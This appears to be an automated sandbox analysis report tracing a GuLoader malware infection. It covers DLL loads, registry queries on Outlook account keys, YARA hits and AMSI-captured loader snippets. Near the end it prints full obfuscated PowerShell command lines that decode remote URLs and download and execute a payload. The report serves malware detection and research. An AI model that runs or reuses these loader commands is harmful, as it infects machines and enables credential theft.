Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: propsys.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: edputil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: appresolver.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: slc.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sppc.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: pdh.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	Section loaded: rasadhlp.dll

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

Jump to behavior

Source:	Binary string: ystem.Core.pdb source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbT source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: wab.exe
Source:	Binary string: ws\System.Core.pdbK source: powershell.exe, 00000005.00000002.2202717320.0000000007413000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb% source: powershell.exe, 00000005.00000002.2202717320.0000000007320000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 0000001A.00000002.2815364367.0000000004843000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2702490356.000000000A283000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2206269200.000000000C162000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2206071533.0000000008740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3003059273.00000000059E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2668039251.0000000005634000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2701170946.00000000085A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2199790164.0000000005B55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2469006444.0000020B6C824000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Udluftningerne)$global:Imagined = [System.Text.Encoding]::ASCII.GetString($Klippegulvet)$global:Rumsterede=$Imagined.substring($Governorates,$Supermagtsstrategiernes)<#Beslaglgning F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((badarrah $Repine $Radiologernes), (Klassekvotienterne @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Squamate = [AppDomain]::CurrentDomain.GetAssemblies()
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Mercerization)), $Tradeful).DefineDynamicModule($Caic, $false).DefineType($Brandishing, $Gundeck, [System.MulticastDelegate])$Dissoul.
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Udluftningerne)$global:Imagined = [System.Text.Encoding]::ASCII.GetString($Klippegulvet)$global:Rumsterede=$Imagined.substring($Governorates,$Supermagtsstrategiernes)<#Beslaglgning F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Xenophontic249)$global:Ghettoes = [System.Text.Encoding]::ASCII.GetString($Hypocholesterinemia)$global:xylopyrography=$Ghettoes.substring($Callovian,$Malaceae)<#luxembourgerens Frihe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Tvetunget $Sagsomkostninger $Regeringernes), (Komponentplaceringstegning @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:udgangsforbud = [AppDomain]::Curre
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Tallote)), $Nektarin199).DefineDynamicModule($Unoriginal, $false).DefineType($Rhabdom, $Vedhftendes, [System.MulticastDelegate])$Debar
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Xenophontic249)$global:Ghettoes = [System.Text.Encoding]::ASCII.GetString($Hypocholesterinemia)$global:xylopyrography=$Ghettoes.substring($Callovian,$Malaceae)<#luxembourgerens Frihe

Obfuscated command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$Ovg
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p 